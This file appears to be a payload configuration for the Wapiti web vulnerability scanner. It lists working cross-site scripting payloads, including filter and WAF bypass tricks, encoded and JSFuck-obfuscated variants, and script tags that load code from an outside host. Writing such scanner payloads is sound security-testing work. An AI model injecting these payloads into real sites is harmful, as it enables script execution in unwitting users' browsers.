; Let's start with the most obvious XSS payloads
[case_script_alert_quote]
payload = <ScRiPt>alert('__XSS__')</sCrIpT>
tag = script
attribute = full_string
value = alert('__XSS__')
case_sensitive = yes

[case_script_alert_double_quote]
payload = <ScRiPt>alert("__XSS__")</sCrIpT>
tag = script
attribute = full_string
value = alert("__XSS__")
case_sensitive = yes

; Look mah! No [double|simple]quotes!
[case_script_alert_regex]
payload = <ScRiPt>alert(/__XSS__/)</sCrIpT>
tag = script
attribute = full_string
value = alert(/__XSS__/)
case_sensitive = yes

; Look mah! No whitespace! No script tags!
[svg_onload_alert_regex]
payload = <SvG/oNloAd=alert(/__XSS__/)>
tag = svg
attribute = onload
value = alert(/__XSS__/)
case_sensitive = yes

; Look mah! No whitespace! No script tags! No closing tag
[svg_onload_alert_regex_left_open]
payload = <SvG/oNloAd=alert(/__XSS__/)//
tag = svg
attribute = onload
value = alert(/__XSS__/)
case_sensitive = yes
match_type = starts_with

; I saw webpages cuttings words on uppercase letters so let's keep only the S uppercase
[script_absolute_src]
payload = <Script src=https://wapiti3.ovh/__XSS__z.js></Script>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no

[script_protocol_src]
payload = <ScRiPt src=//wapiti3.ovh/__XSS__z.js></ScRiPt>
tag = script
attribute = src
value = //wapiti3.ovh/__XSS__z.js
case_sensitive = no

[script_alert_parentheses_regex]
payload = <ScRiPt>(alert)(/__XSS__/);</ScRiPt>
tag = script
attribute = full_string
value = (alert)(/__XSS__/);
case_sensitive = yes

; No slash :)
[img_onerror_alert_double_quote]
payload = <ImG src=z oNeRror=alert("__XSS__")>
tag = img
attribute = onerror
value = alert("__XSS__")
case_sensitive = yes

[img_onerror_alert_quote]
payload = <ImG src=z oNeRror=alert('__XSS__')>
tag = img
attribute = onerror
value = alert('__XSS__')
case_sensitive = yes

[img_onerror_alert_regex]
payload = <ImG src=z oNeRror=alert(/__XSS__/)>
tag = img
attribute = onerror
value = alert(/__XSS__/)
case_sensitive = yes

[object_data_alert_quote]
payload = <object data="javascript:alert('__XSS__')">
tag = object
attribute = data
value = javascript:alert('__XSS__')
case_sensitive = yes

[param_value_alert_quote]
payload = <object data="JaVasCript:alert('__XSS__')">
tag = object
attribute = data
value = JaVasCript:alert('__XSS__')
case_sensitive = yes

[param_value_alert_double_quote]
payload = <object data='JaVasCript:alert("__XSS__")'>
tag = object
attribute = data
value = JaVasCript:alert("__XSS__")
case_sensitive = yes

[iframe_src_javascript]
payload = <iFrAme src="jAvasCript:alert(/__XSS__/);"></iframe>
tag = iframe
attribute = src
value = javascript:alert(/__XSS__/)
case_sensitive = yes

[details_ontoggle]
payload = <details open ontoggle=confirm(/__XSS__/)>
tag = details
attribute = ontoggle
value = confirm(/__XSS__/)
case_sensitive = yes

[body_onpageshow]
payload = <body/oNpagEshoW=(confirm)(/__XSS__/)>
tag = body
attribute = onpageshow
value = (confirm)(/__XSS__/)
case_sensitive = yes

[frame_src_javascript]
payload = <frameset><frame src="javascript:alert(/__XSS__/);"></frame>
tag = frame
attribute = src
value = javascript:alert(/__XSS__/)
case_sensitive = yes

[marquee_onfinish]
payload = <marquee loop=1 width=0 onfinish=prompt(/__XSS__/)>
tag = marquee
attribute = onfinish
value = prompt(/__XSS__/)
case_sensitive = yes

[svg_animate]
payload = ><svg><animate onbegin=prompt(/__XSS__/) attributeName=u dur=1s>
tag = animate
attribute = onbegin
value = prompt(/__XSS__/)
case_sensitive = yes


; Tricks
; Those are simple case sensitive bypass
[case_script_slash_absolute_src]
payload = <ScRiPt/src=https://wapiti3.ovh/__XSS__z.js></sCrIpT/>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no


; Try injecting whitespaces...
[case_tab_script_absolute_src]
payload = <ScRiPt[TAB]src=https://wapiti3.ovh/__XSS__z.js></sCrIpT>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no

[tab_img_onerror_alert]
payload = <ImG[TAB]src=z[TAB]oNeRror=alert(/__XSS__/)>
tag = img
attribute = onerror
value = alert(/__XSS__/)
case_sensitive = yes

[ff_script_alert_regex]
payload = 0[FF]<sCripT[FF]>alert(/__XSS__/)</sCripT[FF]>[FF]0
tag = script
attribute = full_string
value = alert(/__XSS__/)
case_sensitive = yes

[case_tab_script_alert]
payload = <ScRiPt[TAB]>alert(/__XSS__/)</sCrIpT[TAB]>
tag = script
attribute = full_string
value = alert(/__XSS__/)
case_sensitive = yes

[tab_object_data_alert]
payload = <object[TAB]data=javAscripT:alert(/__XSS__/)>
tag = object
attribute = data
value = javascript:alert(/__XSS__/)
case_sensitive = yes


; Bypass remove of tags
[script_tag_remove_alert_quote]
payload = <scr<script>ipt>(alert)(/__XSS__/)//</scr</script>ipt>
tag = script
attribute = full_string
value = alert(/__XSS__/)//
case_sensitive = yes
match_type = starts_with

[open_script_tag_remove_absolute_src]
payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></script>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no

[script_tag_remove_absolute_src]
payload = <scr<script>ipt src=https://wapiti3.ovh/__XSS__z.js></scr</script>ipt>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no

[cloudflare_bypass]
payload = <img src onerror=&emsp;prompt`${/__XSS__/}`>
tag = img
attribute = onerror
value = &emsp;prompt`${/__XSS__/}`
case_sensitive = yes

[script_comment]
payload = <sCrIpt><!--[LF]confirm(/__XSS__/)//--></sCrIpt>
tag = script
attribute = full_string
value = confirm(/__XSS__/)
case_sensitive = yes

[bypass_script_absolute_src]
payload = <Script e=">" src="https://wapiti3.ovh/__XSS__z.js"></Script>
tag = script
attribute = src
value = https://wapiti3.ovh/__XSS__z.js
case_sensitive = no

[img_onerror_bypass_some_removals]
payload = <img src=k onerror=prompt`__XSS__`>
tag = img
attribute = onerror
value = prompt`__XSS__`
case_sensitive = yes

; svg payload than can be mixed case + no parenthesis + no slash
[svg_onload_encoded_alert]
payload = <svg onload=&#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29>
tag = svg
attribute = onload
value = &#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29
case_sensitive = no

; try to evade various rules
[input_autofocus]
payload = <input autofocus onfocus =top[(9350252040-8).toString(40-10)](/__XSS___/)>
tag = input
attribute = onfocus
value = top[(9350252040-8).toString(40-10)](/__XSS___/)
case_sensitive = yes

[script_jsfuck_alert_1]
payload = <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script>
tag = script
attribute = full_string
value = [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
case_sensitive = no